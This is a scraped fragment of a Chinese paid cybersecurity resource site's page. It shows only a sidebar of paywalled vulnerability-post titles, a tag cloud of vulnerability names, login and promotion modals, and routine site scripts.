class="meta-author flex ac"><a href="https://vip.bdziyi.com/author/1/"><span class="avatar-mini"><img alt="棉花糖的头像-棉花糖会员站" src="https://oss.bdziyi.com/vip/2024/10/20241011084359492.jpg" data-src="//oss.bdziyi.com/vip/2024/03/20240324112603946-150x150.jpg" class="lazyload avatar avatar-id-1"><img class="lazyload avatar-badge" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail.svg" data-src="https://vip.bdziyi.com/wp-content/themes/zibll/img/vip-1.svg" data-toggle="tooltip" title="糖心会员" alt="糖心会员"></span></a><span class="ml6">2025年12月18日</span></item><div class="meta-right"><item class="meta-pay badg badg-sm mr6 c-yellow" data-toggle="tooltip" title="付费阅读"><i class="fa fa-book mr3"></i><span class="em09"><svg class="" aria-hidden="true"><use xlink:href="#icon-points"></use></svg></span>9999</item><item class="meta-view"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-view"></use></svg>648</item></div></div></div></div><div class="posts-mini "><div class="posts-mini-con flex xx flex1 jsb"><h2 class="item-heading text-ellipsis"><span class="badg badg-sm mr3 c-green">5</span><a href="https://vip.bdziyi.com/60866/">友加畅捷管理系统 RepFile.ashx 存在文件上传致RCE<span class="focus-color"></span></a></h2><div class="item-meta muted-2-color flex jsb ac mt6"><item class="meta-author flex ac"><a href="https://vip.bdziyi.com/author/1/"><span class="avatar-mini"><img alt="棉花糖的头像-棉花糖会员站" src="https://oss.bdziyi.com/vip/2024/10/20241011084359492.jpg" data-src="//oss.bdziyi.com/vip/2024/03/20240324112603946-150x150.jpg" class="lazyload avatar avatar-id-1"><img class="lazyload avatar-badge" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail.svg" data-src="https://vip.bdziyi.com/wp-content/themes/zibll/img/vip-1.svg" data-toggle="tooltip" title="糖心会员" alt="糖心会员"></span></a><span class="ml6">2025年12月18日</span></item><div class="meta-right"><item class="meta-pay badg badg-sm mr6 c-yellow" data-toggle="tooltip" title="付费阅读"><i class="fa fa-book mr3"></i><span class="em09"><svg class="" aria-hidden="true"><use xlink:href="#icon-points"></use></svg></span>9999</item><item class="meta-view"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-view"></use></svg>647</item></div></div></div></div><div class="posts-mini "><div class="posts-mini-con flex xx flex1 jsb"><h2 class="item-heading text-ellipsis"><span class="badg badg-sm mr3 ">6</span><a href="https://vip.bdziyi.com/60868/">用友NC pkevalset SQL注入<span class="focus-color"></span></a></h2><div class="item-meta muted-2-color flex jsb ac mt6"><item class="meta-author flex ac"><a href="https://vip.bdziyi.com/author/1/"><span class="avatar-mini"><img alt="棉花糖的头像-棉花糖会员站" src="https://oss.bdziyi.com/vip/2024/10/20241011084359492.jpg" data-src="//oss.bdziyi.com/vip/2024/03/20240324112603946-150x150.jpg" class="lazyload avatar avatar-id-1"><img class="lazyload avatar-badge" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail.svg" data-src="https://vip.bdziyi.com/wp-content/themes/zibll/img/vip-1.svg" data-toggle="tooltip" title="糖心会员" alt="糖心会员"></span></a><span class="ml6">2025年12月19日</span></item><div class="meta-right"><item class="meta-pay badg badg-sm mr6 c-yellow" data-toggle="tooltip" title="付费阅读"><i class="fa fa-book mr3"></i><span class="em09"><svg class="" aria-hidden="true"><use xlink:href="#icon-points"></use></svg></span>9999</item><item class="meta-view"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-view"></use></svg>634</item></div></div></div></div></div></div><div class="theme-box"><div class="box-body notop"><div class="title-theme">标签云</div></div><div class="zib-widget widget-tag-cloud author-tag"><a href="https://vip.bdziyi.com/tag/%e9%be%99%e6%b5%8f%e8%a7%88%e5%99%a8%e6%9c%aa%e5%bc%95%e7%94%a8%e7%9a%84%e6%9c%8d%e5%8a%a1%e8%b7%af%e5%be%84%e7%89%b9%e6%9d%83%e5%8d%87%e7%ba%a7/" class="text-ellipsis but ">龙浏览器未引用的服务路径特权升级</a><a href="https://vip.bdziyi.com/tag/%e9%bd%bf%e8%bd%ae%e5%9c%b0%e7%90%86%e4%bd%8d%e7%bd%ae%e6%9f%a5%e8%af%a2/" class="text-ellipsis but c-blue-2">齿轮地理位置查询</a><a href="https://vip.bdziyi.com/tag/%e9%bc%a0%e6%a0%87%e9%bc%a0%e6%a0%87%e6%8c%89%e9%92%ae%e5%91%bd%e4%bb%a4%e6%b3%a8%e5%85%a5%e8%bf%9c%e7%a8%8b/" class="text-ellipsis but c-yellow-2">鼠标鼠标按钮命令注入远程</a><a href="https://vip.bdziyi.com/tag/%e9%bc%a0%e6%a0%87%e8%bf%9c%e7%a8%8b%e4%bb%a3%e7%a0%81%e6%89%a7%e8%a1%8c/" class="text-ellipsis but c-green-2">鼠标远程代码执行</a><a href="https://vip.bdziyi.com/tag/%e9%bc%a0%e6%a0%87%e8%bf%9c%e7%a8%8b%e4%bb%a3%e7%a0%81/" class="text-ellipsis but c-purple-2">鼠标远程代码</a><a href="https://vip.bdziyi.com/tag/%e9%bc%a0%e6%a0%87%e8%b7%af%e5%be%84%e9%81%8d%e5%8e%86/" class="text-ellipsis but c-red-2">鼠标路径遍历</a><a href="https://vip.bdziyi.com/tag/%e9%bc%a0%e6%a0%87%e6%9c%ac%e5%9c%b0%e6%96%87%e4%bb%b6%e5%8c%85%e5%90%ab/" class="text-ellipsis but c-blue">鼠标本地文件包含</a><a href="https://vip.bdziyi.com/tag/%e9%bc%a0%e6%a0%87%e6%9c%aa%e5%bc%95%e7%94%a8%e7%9a%84%e6%9c%8d%e5%8a%a1%e8%b7%af%e5%be%84/" class="text-ellipsis but c-yellow">鼠标未引用的服务路径</a><a href="https://vip.bdziyi.com/tag/%e9%bc%a0%e6%a0%87%e4%ba%8b%e4%bb%b6%e7%8a%b6%e6%80%81%e6%a0%8f/" class="text-ellipsis but c-green">鼠标事件状态栏</a><a href="https://vip.bdziyi.com/tag/%e9%bc%a0%e6%a0%87/" class="text-ellipsis but c-purple">鼠标</a><a href="https://vip.bdziyi.com/tag/%e9%bb%98%e8%ae%a4%e9%94%99%e8%af%af%e9%a1%b5%e9%9d%a2%e8%b7%a8%e7%ab%99%e7%82%b9%e8%84%9a%e6%9c%ac/" class="text-ellipsis but c-red">默认错误页面跨站点脚本</a><a href="https://vip.bdziyi.com/tag/%e9%bb%98%e8%ae%a4%e9%85%8d%e7%bd%ae%e8%bf%9c%e7%a8%8b%e4%bb%a3%e7%a0%81%e6%89%a7%e8%a1%8c/" class="text-ellipsis but ">默认配置远程代码执行</a><a href="https://vip.bdziyi.com/tag/%e9%bb%98%e8%ae%a4%e7%ae%a1%e7%90%86%e5%91%98%e5%87%ad%e6%8d%ae/" class="text-ellipsis but c-blue-2">默认管理员凭据</a><a href="https://vip.bdziyi.com/tag/%e9%bb%98%e8%ae%a4%e7%9a%84%e8%b0%83%e5%88%b6%e8%a7%a3%e8%b0%83%e5%99%a8%e4%b8%8a%e7%9a%84%e5%af%86%e7%a0%81%e7%a1%ac%e4%bb%b6%e8%bf%9c%e7%a8%8b/" class="text-ellipsis but c-yellow-2">默认的调制解调器上的密码硬件远程</a><a href="https://vip.bdziyi.com/tag/%e9%bb%98%e8%ae%a4%e6%9d%83%e9%99%90/" class="text-ellipsis but c-green-2">默认权限</a><a href="https://vip.bdziyi.com/tag/%e9%bb%98%e8%ae%a4%e6%9d%83%e5%88%a9/" class="text-ellipsis but c-purple-2">默认权利</a><a href="https://vip.bdziyi.com/tag/%e9%bb%98%e8%ae%a4%e5%bc%b1%e5%af%86%e7%a0%81%e7%bc%96%e7%a0%81/" class="text-ellipsis but c-red-2">默认弱密码编码</a><a href="https://vip.bdziyi.com/tag/%e9%bb%98%e8%ae%a4%e5%af%86%e7%a0%81/" class="text-ellipsis but c-blue">默认密码</a><a href="https://vip.bdziyi.com/tag/%e9%bb%98%e8%ae%a4%e5%ae%89%e5%85%a8%e6%80%a7%e7%a1%ac%e4%bb%b6%e8%bf%9c%e7%a8%8b/" class="text-ellipsis but c-yellow">默认安全性硬件远程</a><a href="https://vip.bdziyi.com/tag/%e9%bb%98%e8%ae%a4%e5%92%8c%e5%bc%b1%e5%8a%a0%e5%af%86/" class="text-ellipsis but c-green">默认和弱加密</a></div></div></div></main>
<div class="container fluid-widget"></div><footer class="footer">
<div class="container-fluid container-footer">
<ul class="list-inline"><li class="hidden-xs" style="max-width: 300px;"><p><a class="footer-logo" href="https://vip.bdziyi.com" title="棉花糖VIP-无境网安靶场-糖心会员-网络安全资源大全-文档库-漏洞库">
<img src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail-sm.svg" data-src="https://oss.bdziyi.com/vip/2024/11/20241126051508458.jpg" switch-src="https://oss.bdziyi.com/vip/2024/11/20241126051508458.jpg" alt="棉花糖VIP-无境网安靶场-糖心会员-网络安全资源大全-文档库-漏洞库" class="lazyload" style="height: 40px;">
</a></p><div class="footer-muted em09">本站为棉花糖会员站</div></li><li style="max-width: 550px;"><p class="fcode-links"><a href="https://oss.bdziyi.com/vip/2024/03/20240324085635914.png">友链申请</a>
<a href="https://www.gpt-all.chat/">AI大全 集合网站</a></p><div class="footer-muted em09">Copyright © 2025 · <a href="https://vip.bdziyi.com">棉花糖会员站</a>
<p><a href="https://beian.miit.gov.cn/" style="color: #fbbc05;" target="_blank">
蜀ICP备2025159183号-1</a></p><a href="https://beian.mps.gov.cn/#/query/webSearch?code=51152402000171"
target="_blank"
rel="noreferrer"
style="display:inline-flex; align-items:center; text-decoration:none; color:#fbbc05;">
<img src="https://beian.mps.gov.cn/web/assets/logo01.6189a29f.png"
alt="公安备案图标"
style="height:20px; border:none; margin-right:0.5em;">
川公网安备51152402000171号
</a></div><div class="footer-contact mt10"><a class="toggle-radius hover-show nowave" href="javascript:;"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-d-wechat"></use></svg><div class="hover-show-con footer-wechat-img"><img style="box-shadow: 0 5px 10px rgba(0,0,0,.2); border-radius:4px;" height="100" class="lazyload" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail-sm.svg" data-src="https://oss.bdziyi.com/vip/2025/09/20250920064037857.png" alt="扫一扫加微信-棉花糖会员站"></div></a><a class="toggle-radius" data-toggle="tooltip" title="发邮件" href="mailto:1113335577@QQ.COM"><svg class="icon" aria-hidden="true" data-viewBox="-20 80 1024 1024" viewBox="-20 80 1024 1024"><use xlink:href="#icon-d-email"></use></svg></a></div></li><li><div class="footer-miniimg" data-toggle="tooltip" title="扫码加微信">
<p>
<img class="lazyload" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail-sm.svg" data-src="https://oss.bdziyi.com/vip/2025/09/20250920064037857.png" alt="扫码加微信-棉花糖会员站">
</p>
<span class="opacity8 em09">扫码加微信</span>
</div></li></ul> </div>
</footer>
<script type="speculationrules">
{"prefetch":[{"source":"document","where":{"and":[{"href_matches":"\/*"},{"not":{"href_matches":["\/wp-*.php","\/wp-admin\/*","\/vip\/*","\/wp-content\/*","\/wp-content\/plugins\/*","\/wp-content\/themes\/zibll\/*","\/*\\?(.+)"]}},{"not":{"selector_matches":"a[rel~=\"nofollow\"]"}},{"not":{"selector_matches":".no-prefetch, .no-prefetch a"}}]},"eagerness":"conservative"}]}
</script>
<script type="text/javascript">
window._win = {
views: '4833',
www: 'https://vip.bdziyi.com',
uri: 'https://vip.bdziyi.com/wp-content/themes/zibll',
ver: '8.3',
imgbox: '1',
imgbox_type: 'group',
imgbox_thumbs: '1',
imgbox_zoom: '1',
imgbox_full: '1',
imgbox_play: '1',
imgbox_down: '1',
sign_type: 'modal',
signin_url: 'https://vip.bdziyi.com/user-sign-6/?tab=signin&redirect_to=https%3A%2F%2Fvip.bdziyi.com%2F4833%2F',
signup_url: 'https://vip.bdziyi.com/user-sign-6/?tab=signup&redirect_to=https%3A%2F%2Fvip.bdziyi.com%2F4833%2F',
ajax_url: 'https://vip.bdziyi.com/wp-admin/admin-ajax.php',
ajaxpager: '',
ajax_trigger: '<i class="fa fa-angle-right"></i>加载更多',
ajax_nomore: '没有更多内容了',
qj_loading: '1',
highlight_kg: '1',
highlight_hh: '1',
highlight_btn: '1',
highlight_zt: 'enlighter',
highlight_white_zt: 'enlighter',
highlight_dark_zt: 'dracula',
upload_img_size: '3',
img_upload_multiple: '20',
upload_video_size: '30',
upload_file_size: '30',
upload_ext: 'jpg|jpeg|jpe|gif|png|bmp|tiff|tif|webp|avif|ico|heic|heif|heics|heifs|asf|asx|wmv|wmx|wm|avi|divx|flv|mov|qt|mpeg|mpg|mpe|mp4|m4v|ogv|webm|mkv|3gp|3gpp|3g2|3gp2|txt|asc|c|cc|h|srt|csv|tsv|ics|rtx|css|vtt|dfxp|mp3|m4a|m4b|aac|ra|ram|wav|x-wav|ogg|oga|flac|mid|midi|wma|wax|mka|rtf|pdf|class|tar|zip|gz|gzip|rar|7z|psd|xcf|doc|pot|pps|ppt|wri|xla|xls|xlt|xlw|mdb|mpp|docx|docm|dotx|dotm|xlsx|xlsm|xlsb|xltx|xltm|xlam|pptx|pptm|ppsx|ppsm|potx|potm|ppam|sldx|sldm|onetoc|onetoc2|onetmp|onepkg|oxps|xps|odt|odp|ods|odg|odc|odb|odf|wp|wpd|key|numbers|pages',
user_upload_nonce: '055208c7a0',
is_split_upload: '1',
split_minimum_size: '20',
comment_upload_img: '1'
}
</script>
<div class="float-right round position-bottom scroll-down-hide"><a style="--this-color:#f2c97d;--this-bg:rgba(62,62,67,0.9);" class="float-btn signin-loader" data-toggle="tooltip" data-placement="left" title="开通会员" href="javascript:;"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-vip_1"></use></svg></a><span class="newadd-btns hover-show float-btn add-btn">
<svg class="icon" aria-hidden="true"><use xlink:href="#icon-add-ring"></use></svg>
<div class="hover-show-con dropdown-menu drop-newadd"><a rel="nofollow" class="btn-newadd" href="https://vip.bdziyi.com/newposts-5/"><icon class="jb-green"><i class="fa fa-pencil-square"></i></icon><text>投稿文章</text></a><a rel="nofollow" class="btn-newadd" href="https://vip.bdziyi.com/posts-edit"><icon class="jb-blue"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-posts"></use></svg></icon><text>发布帖子</text></a></div>
</span><a class="float-btn service-wechat hover-show nowave" title="扫码添加微信" href="javascript:;"><i class="fa fa-wechat"></i><div class="hover-show-con dropdown-menu"><img class="radius4 relative" width="100%" class="lazyload" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail-sm.svg" data-src="https://oss.bdziyi.com/vip/2025/07/20250709061853399.jpg" alt="扫码添加微信-棉花糖会员站"></div></a><span class="float-btn qrcode-btn hover-show service-wechat"><i class="fa fa-qrcode"></i><div class="hover-show-con dropdown-menu"><div class="qrcode" data-size="100"></div><div class="mt6 px12 muted-color">在手机上浏览此页面</div></div></span><a class="float-btn ontop fade" data-toggle="tooltip" data-placement="left" title="返回顶部" href="javascript:(scrollTopTo());"><i class="fa fa-angle-up em12"></i></a></div><div mini-touch="nav_search" touch-direction="top" class="main-search fixed-body main-bg box-body navbar-search nopw-sm"><div class="container"><div class="mb20"><button class="close" data-toggle-class data-target=".navbar-search" ><svg class="ic-close" aria-hidden="true"><use xlink:href="#icon-close"></use></svg></button></div><div remote-box="https://vip.bdziyi.com/wp-admin/admin-ajax.php?action=search_box" load-click><div class="search-input"><p><i class="placeholder s1 mr6"></i><i class="placeholder s1 mr6"></i><i class="placeholder s1 mr6"></i></p><p class="placeholder k2"></p>
<p class="placeholder t1"></p><p><i class="placeholder s1 mr6"></i><i class="placeholder s1 mr6"></i><i class="placeholder s1 mr6"></i><i class="placeholder s1 mr6"></i></p><p class="placeholder k1"></p><p class="placeholder t1"></p><p></p>
<p class="placeholder k1" style="height: 80px;"></p>
</div></div></div></div> <div class="modal fade" id="u_sign" tabindex="-1" role="dialog">
<div class="modal-dialog" role="document">
<div class="sign-content">
<div class="sign-img absolute hide-sm"><img class="fit-cover radius8 lazyload" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail.svg" data-src="https://oss.bdziyi.com/vip/2024/04/20240411155954828.jpg" alt="棉花糖VIP-无境网安靶场-糖心会员-网络安全资源大全-文档库-漏洞库"></div> <div class="sign zib-widget blur-bg relative">
<button class="close" data-dismiss="modal">
<svg class="ic-close" aria-hidden="true" data-viewBox="0 0 1024 1024" viewBox="0 0 1024 1024"><use xlink:href="#icon-close"></use></svg> </button>
<div class="text-center"><div class="sign-logo box-body"><img src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail-sm.svg" data-src="https://oss.bdziyi.com/vip/2024/03/20240324080312906.png" switch-src="https://oss.bdziyi.com/vip/2024/03/20240324080312906.png" alt="棉花糖VIP-无境网安靶场-糖心会员-网络安全资源大全-文档库-漏洞库" class="lazyload"></div></div> <div class="tab-content"><div class="tab-pane fade active in" id="tab-sign-in"><div class="box-body"><div class="title-h-left fa-2x">登录</div><a class="muted-color px12" href="#tab-sign-up" data-toggle="tab">没有账号?立即注册<i class="em12 ml3 fa fa-angle-right"></i></a></div><div id="sign-in"><form><div class="relative line-form mb10"><input type="text" name="username" class="line-form-input" tabindex="1" placeholder=""><i class="line-form-line"></i><div class="scale-placeholder">用户名或邮箱</div></div><div class="relative line-form mb10"><input type="password" name="password" class="line-form-input" tabindex="2" placeholder=""><div class="scale-placeholder">登录密码</div><div class="abs-right passw muted-2-color"><i class="fa-fw fa fa-eye"></i></div><i class="line-form-line"></i></div><input machine-verification="geetest" type="hidden" name="captcha_mode" value="geetest" geetest-id="246fa471ce4513eb6fa70847deb7f3f5"><div class="relative line-form mb10 em09"><span class="muted-color form-checkbox"><input type="checkbox" id="remember" checked="checked" tabindex="4" name="remember" value="forever"><label for="remember" class="ml3">记住登录</label></span><span class="pull-right muted-2-color"><a rel="nofollow" class="muted-2-color" href="https://vip.bdziyi.com/user-sign-6/?tab=resetpassword&redirect_to=https%3A%2F%2Fvip.bdziyi.com%2F4833%2F">找回密码</a></span></div><div class="box-body"><input type="hidden" name="action" value="user_signin"><button type="button" class="but radius jb-blue padding-lg signsubmit-loader btn-block"><i class="fa fa-sign-in mr10"></i>登录</button></div></form><p class="social-separator separator muted-3-color em09">社交账号登录</p><div class="social_loginbar"><a rel="nofollow" title="微信登录" href="https://vip.bdziyi.com/oauth/weixingzh?rurl=https%3A%2F%2Fvip.bdziyi.com%2F4833%2F" class="social-login-item weixingzh toggle-radius qrcode-signin"><i class="fa fa-weixin" aria-hidden="true"></i></a></div><div class="muted-color mt10 text-center px12 opacity8">使用社交账号登录即表示同意<a class="focus-color" target="_blank" href="https://vip.bdziyi.com/%e7%94%a8%e6%88%b7%e5%8d%8f%e8%ae%ae/">用户协议</a>、<a class="focus-color" target="_blank" href="https://vip.bdziyi.com/privacy-policy/">隐私声明</a></div></div></div><div class="tab-pane fade" id="tab-sign-up"><div class="box-body"><div class="title-h-left fa-2x">注册</div><a class="muted-color px12" href="#tab-sign-in" data-toggle="tab">已有账号,立即登录<i class="em12 ml3 fa fa-angle-right"></i></a></div><form id="sign-up"><div class="relative line-form mb10"><input type="text" name="name" class="line-form-input" tabindex="1" placeholder=""><i class="line-form-line"></i><div class="scale-placeholder">设置用户名</div></div><div class="relative line-form mb10"><input change-show=".change-show" type="text" name="email" class="line-form-input" tabindex="1" placeholder=""><i class="line-form-line"></i><div class="scale-placeholder">邮箱</div></div><input machine-verification="geetest" type="hidden" name="captcha_mode" value="geetest" geetest-id="246fa471ce4513eb6fa70847deb7f3f5"><div class="relative line-form mb10 change-show"><input type="text" name="captch" class="line-form-input" autocomplete="off" tabindex="2" placeholder=""><i class="line-form-line"></i><div class="scale-placeholder">验证码</div><span class="yztx abs-right"><button type="button" form-action="signup_captcha" class="but c-blue captchsubmit">发送验证码</button></span><div class="abs-right match-ok muted-color"><i class="fa-fw fa fa-check-circle"></i></div><input type="hidden" name="captcha_type" value="email"><input type="hidden" id="_wpnonce" name="_wpnonce" value="f74c365063" /></div><div class="relative line-form mb10"><input type="password" name="password2" class="line-form-input" tabindex="3" placeholder=""><div class="scale-placeholder">设置密码</div><div class="abs-right passw muted-2-color"><i class="fa-fw fa fa-eye"></i></div><i class="line-form-line"></i></div><div class="relative line-form mb10"><input type="password" name="repassword" class="line-form-input" tabindex="4" placeholder=""><div class="scale-placeholder">重复密码</div><div class="abs-right passw muted-2-color"><i class="fa-fw fa fa-eye"></i></div><i class="line-form-line"></i></div><div class="box-body"><input type="hidden" name="action" value="user_signup"><button type="button" class="but radius jb-green padding-lg signsubmit-loader btn-block"><svg class="icon mr10" aria-hidden="true" data-viewBox="0 0 1024 1024" viewBox="0 0 1024 1024"><use xlink:href="#icon-signup"></use></svg>注册</button><div class="form-checkbox muted-color mt10 text-center px12 opacity8"><input name="user_agreement" id="user_agreement" type="checkbox"><label for="user_agreement" class="px12 ml6" style="font-weight:normal;">已阅读并同意<a class="focus-color" target="_blank" href="https://vip.bdziyi.com/%e7%94%a8%e6%88%b7%e5%8d%8f%e8%ae%ae/">用户协议</a>、<a class="focus-color" target="_blank" href="https://vip.bdziyi.com/privacy-policy/">隐私声明</a></label></div></div></form></div><div class="tab-pane fade" id="tab-qrcode-signin"><div class="box-body"><div class="title-h-left fa-2x">扫码登录</div><span class="muted-3-color px12">使用<a class="muted-color" href="#tab-sign-in" data-toggle="tab">其它方式登录</a>或<a class="muted-color" href="#tab-sign-up" data-toggle="tab">注册</a></span><a class="muted-color px12 hide" href="#tab-qrcode-signin" data-toggle="tab">扫码登录</a></div><div class="qrcode-signin-container box-body text-center"><p class="placeholder" style="height:180px;width:180px;margin:auto;"></p><p class="placeholder" style="height:27px;width:200px;margin:15px auto 0;"></p></div><div class="muted-color mt10 text-center px12 opacity8">扫码登录即表示同意<a class="focus-color" target="_blank" href="https://vip.bdziyi.com/%e7%94%a8%e6%88%b7%e5%8d%8f%e8%ae%ae/">用户协议</a>、<a class="focus-color" target="_blank" href="https://vip.bdziyi.com/privacy-policy/">隐私声明</a></div></div></div> </div>
</div>
</div>
</div>
<div class="modal fade" id="rewards-modal-1" tabindex="-1" role="dialog"><div class="modal-dialog modal-mini rewards-popover" style="" role="document"><div class="modal-content"><div style="padding: 1px;"><div class="modal-colorful-header colorful-bg jb-blue"><button class="close" data-dismiss="modal"><svg class="ic-close" aria-hidden="true"><use xlink:href="#icon-close"></use></svg></button><div class="colorful-make"></div><div class="text-center"><div class="em2x"><i class="loading"></i></div></div></div><div class="modal-body"><ul class="flex jse mb10 text-center rewards-box"><li><p class="placeholder s1"></p><div class="rewards-img"> <h4 class="placeholder fit-cover"></h4></div></li> <li><p class="placeholder s1"></p><div class="rewards-img"> <h4 class="placeholder fit-cover"></h4></div></li></ul></div></div></div></div></div> <div class="modal fade" id="modal-system-notice" tabindex="-1" role="dialog">
<div class="modal-dialog modal-mini"
style="" role="document">
<div class="modal-content">
<div class="modal-body">
<div style="padding: 1px;"><div class="modal-colorful-header colorful-bg jb-yellow"><button class="close" data-dismiss="modal"><svg class="ic-close" aria-hidden="true"><use xlink:href="#icon-close"></use></svg></button><div class="colorful-make"></div><div class="text-center"><div class="em2x"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-vip_1"></use></svg></div><div class="mt10 em12 padding-w10">会员低价促销中~</div></div></div><div><body>
<p style="color: orange;">网安全量靶场无境上线,全网最便宜独立环境靶场!</p>
<p style="color: orange;">独家代码审计、凌风云自助获取、ICP信息批量查询等功能已上线</p>
<p style="color: green;">网络安全从拥有一个资源大全开始!</p>
<p style="color: orange;">现在购买仅需99元一年!续费还享八折!</p>
</body>
</div></div> </div>
<div class="modal-buts box-body notop text-right"><a type="button" target=_blank class="but radius c-blue" href="http://s.mrw.so/6XqGa">详细介绍</a><a type="button" class="but radius c-green" href="https://vip.bdziyi.com/index.php/user-sign/">注册登陆</a></div> </div>
</div>
</div>
<script type="text/javascript">window.onload = function(){
setTimeout(function () {$('#modal-system-notice').modal('show');
$.cookie("showed_system_notice","showed", {path: "/",expires: 1});
}, 500)};</script> <script>
jQuery(document).ready(function ($) {
function handleAgreementSubmission() {
var _user_agreement_auths = $('.auth-apply-from [name="user_agreement_auths"]');
if (_user_agreement_auths.length && !_user_agreement_auths.is(':checked')) {
var _user_agreement_auths_box = _user_agreement_auths.closest('.form-check');
_user_agreement_auths_box.addClass('ani shake');
setTimeout(function () {
_user_agreement_auths_box.removeClass('ani shake');
}, 400);
notyf('请先阅读并同意协议', 'danger');
// 禁用按钮1秒后恢复
$('.but.c-blue').prop('disabled', true);
setTimeout(function() {
$('.but.c-blue').prop('disabled', false);
}, 1000);
} else {
// 启用按钮(可选,根据需要)
$('.but.c-blue').prop('disabled', false);
}
}
$('body').on('click', '.but-average.modal-buts .but.c-blue', function () {
handleAgreementSubmission();
});
});
</script>
<script type="text/javascript" src="https://vip.bdziyi.com/wp-content/themes/zibll/js/libs/bootstrap.min.js?ver=8.3" id="bootstrap-js"></script>
<script type="text/javascript" src="https://vip.bdziyi.com/wp-content/themes/zibll/js/loader.js?ver=8.3" id="_loader-js"></script>
<script type="text/javascript" src="https://vip.bdziyi.com/wp-content/themes/zibll/inc/functions/bbs/assets/js/main.min.js?ver=8.3" id="forums-js"></script>
<script type="text/javascript" src="https://vip.bdziyi.com/wp-content/themes/zibll/inc/functions/shop/assets/js/main.min.js?ver=8.3" id="shop-js"></script>
<script type="text/javascript">var _hmt = _hmt || [];
(function() {
var hm = document.createElement("script");
hm.src = "https://hm.baidu.com/hm.js?b1d5fe7471881173b0b5a05d2c916139";
var s = document.getElementsByTagName("script")[0];
s.parentNode.insertBefore(hm, s);
})();
var links = document.querySelectorAll('.item-tags a');
for (var i = 0; i < links.length; i++) {
var randomColor;
do {
var r = Math.floor(Math.random() * 128) + 128;
var g = Math.floor(Math.random() * 128) + 128;
var b = Math.floor(Math.random() * 128) + 128;
randomColor = 'rgb(' + r + ',' + g + ',' + b + ')';
} while ((r * 0.299 + g * 0.587 + b * 0.114) > 200); // 确保亮度不超过200
links[i].style.backgroundColor = randomColor;
}
//视频
$(document).ready(function() {
$('#xiayg').on('click', function() {
var $videoElement = $('.dplayer-video-wrap .dplayer-video.dplayer-video-current');
if ($videoElement.length) {
$videoElement.attr('src', 'https://api.86512.cn/api/web.php');
$videoElement[0].load();
$videoElement[0].play();
} else {
console.error('找不到视频元素');
}
});
});
</script> <!--baidu_push_js-->
<script type="text/javascript">
(function() {
var bp = document.createElement('script');
var curProtocol = window.location.protocol.split(':')[0];
if (curProtocol === 'https') {
bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
} else {
bp.src = 'http://push.zhanzhang.baidu.com/push.js';
}
var s = document.getElementsByTagName("script")[0];
s.parentNode.insertBefore(bp, s);
})();
</script>
<!--baidu_push_js-->
<script type="text/javascript">
console.log("数据库查询:28次 | 页面生成耗时:961.972ms");
</script>
<script type="text/javascript">
window.WeChatShareDate = {
appId: 'wx8c358971b57c3409',
timestamp: '1766393678',
nonceStr: 'z6bCT1Rl19m8oWcz',
signature: 'bef9ceb81c92ca03ce096c4dd6317d75e58ea0b0',
url: 'https://vip.bdziyi.com/4833/',
title: '',
img: 'https://oss.bdziyi.com/vip/2024/03/20240324075052980.jpg',
desc: '',
}
</script>
<script type="text/javascript">_win.signin_wx_priority = true;</script>
</body>
</html>
<!-- Performance optimized by Redis Object Cache. Learn more: https://wprediscache.com -->
